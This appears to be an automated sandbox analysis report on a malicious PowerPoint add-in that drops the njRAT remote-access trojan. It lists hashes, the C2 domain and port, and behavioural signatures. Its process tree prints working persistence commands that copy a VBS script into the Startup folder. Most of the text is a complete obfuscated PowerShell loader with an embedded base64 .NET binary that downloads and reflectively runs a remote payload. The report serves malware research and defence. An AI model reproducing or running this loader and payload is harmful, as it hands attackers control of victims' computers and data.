Overview

overview

10

Static

static

Comprovant...a.ppam

windows7_x64

10

Comprovant...a.ppam

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    10-01-2022 04:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ComprovanteXdeXreserva.ppam

  • Size

    20KB

  • MD5

    fd0d3e25d88b5c318f4dc543a7770f22

  • SHA1

    94572d313222700a565f2ff161223bb28464636c

  • SHA256

    623027463a2ef70f60ff6a0991019847a3fb24da3b633b52da4a99a77c99f92b

  • SHA512

    48936b4677c10a8466cbaa631a9cbc8ce2b0d995b427fd56c894d98d42abc834bbaeb397401ff131b94f93f05978c8496cf9beaad2f059d8bd04511b40e2e9d8

Score
10/10
njratnyan cattrojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

fidapeste2.duckdns.org:5552

Mutex

94b3fabc19494c

Attributes
  • reg_key

    94b3fabc19494c

  • splitter

    @!#&^%$

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 4 IoCs
  • Drops startup file 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\ComprovanteXdeXreserva.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3432
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\x.vbs"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:2724
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1 -n 5
          4⤵
          • Runs ping.exe
          PID:2980
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4064
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')
            5⤵
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍9✍✍C✍✍✍✍Jw✍✍l✍✍EE✍✍U✍✍B5✍✍Go✍✍Z✍✍Bh✍✍FU✍✍WQBh✍✍Gs✍✍JQ✍✍n✍✍Ds✍✍WwBC✍✍Hk✍✍d✍✍Bl✍✍Fs✍✍XQBd✍✍C✍✍✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍I✍✍✍✍9✍✍C✍✍✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EM✍✍bwBu✍✍HY✍✍ZQBy✍✍HQ✍✍XQ✍✍6✍✍Do✍✍RgBy✍✍G8✍✍bQBC✍✍GE✍✍cwBl✍✍DY✍✍N✍✍BT✍✍HQ✍✍cgBp✍✍G4✍✍Zw✍✍o✍✍C✍✍✍✍J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍p✍✍Ds✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EE✍✍c✍✍Bw✍✍EQ✍✍bwBt✍✍GE✍✍aQBu✍✍F0✍✍Og✍✍6✍✍EM✍✍dQBy✍✍HI✍✍ZQBu✍✍HQ✍✍R✍✍Bv✍✍G0✍✍YQBp✍✍G4✍✍LgBM✍✍G8✍✍YQBk✍✍Cg✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍KQ✍✍u✍✍Ec✍✍ZQB0✍✍FQ✍✍eQBw✍✍GU✍✍K✍✍✍✍n✍✍EM✍✍b✍✍Bh✍✍HM✍✍cwBM✍✍Gk✍✍YgBy✍✍GE✍✍cgB5✍✍DM✍✍LgBD✍✍Gw✍✍YQBz✍✍HM✍✍MQ✍✍n✍✍Ck✍✍LgBH✍✍GU✍✍d✍✍BN✍✍GU✍✍d✍✍Bo✍✍G8✍✍Z✍✍✍✍o✍✍Cc✍✍UgB1✍✍G4✍✍Jw✍✍p✍✍C4✍✍SQBu✍✍HY✍✍bwBr✍✍GU✍✍K✍✍✍✍k✍✍G4✍✍dQBs✍✍Gw✍✍L✍✍✍✍g✍✍Fs✍✍bwBi✍✍Go✍✍ZQBj✍✍HQ✍✍WwBd✍✍F0✍✍I✍✍✍✍o✍✍Cc✍✍VwBH✍✍Dg✍✍Yg✍✍v✍✍Hc✍✍YQBy✍✍C8✍✍ZQBk✍✍G8✍✍Yw✍✍v✍✍G8✍✍aQ✍✍u✍✍HM✍✍b✍✍Bv✍✍G8✍✍d✍✍B3✍✍C8✍✍Lw✍✍6✍✍HM✍✍c✍✍B0✍✍HQ✍✍a✍✍✍✍n✍✍Ck✍✍KQ✍✍=';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('✍✍','A') ) ).replace('%APyjdaUYak%','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c3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawAAF1wAdgA0AC4AMAAuADMAMAAzADEAOQAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAXXABSAGUAZwBBAHMAbQAuAGUAeABlAAAAe000wQGMFUmZ7QBV0BJNAQAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCAcEDg4OEoCJBgABARGAnQUAABKApQYgAQESgKUEAAEODgQgAQ4OBSACDg4OBQACDg4OBQAAEoCxBQABHQUOByABEoCRHQUFIAESaQ4GIAESgLkOBiACHBwdHAYAAQESgIkDAAABBAABHBwEIAECHAMgAAgDIAAOBAcBHgACHgAFEAEAHgAECgEeAAQHARMABhUSKAETAAcGFRJtARMABhUSbQETAAITAAQKARMABSABARMACLd6XFYZNOCJCLA/X38R1Qo6BwYVEigBEgwHBhUSKAESCAcGFRIoARJhBwYVEigBEiQDBhJ9BAYSgIEDBhIYBAAAEgwEAAASCAQAABJhBAAAEiQEAAASfQUAABKAgQYAAQESgIEEAAASGAQAAQEOBCAAEmkHEAEBHgAeAAcwAQEBEB4ABAgAEgwECAASCAQIABJhBAgAEiQECAASfQUIABKAgQQIABIYBCgAEwAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAABQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuNQEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC41BAEAAAAIAQABAAAAAAAYAQAKTXlUZW1wbGF0ZQgxMS4wLjAuMAAAQQEAM1N5c3RlbS5SZXNvdXJjZXMuVG9vbHMuU3Ryb25nbHlUeXBlZFJlc291cmNlQnVpbGRlcggxNi4wLjAuMAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxNi4yLjAuMAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAQAQALTXkuQ29tcHV0ZXIAABMBAA5NeS5BcHBsaWNhdGlvbgAADAEAB015LlVzZXIAABMBAA5NeS5XZWJTZXJ2aWNlcwAAEAEAC015LlNldHRpbmdzAAAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAAAAAAEjHs6YAAAAAAgAAAHkAAAA0OgAANBwAAAAAAAAAAAAA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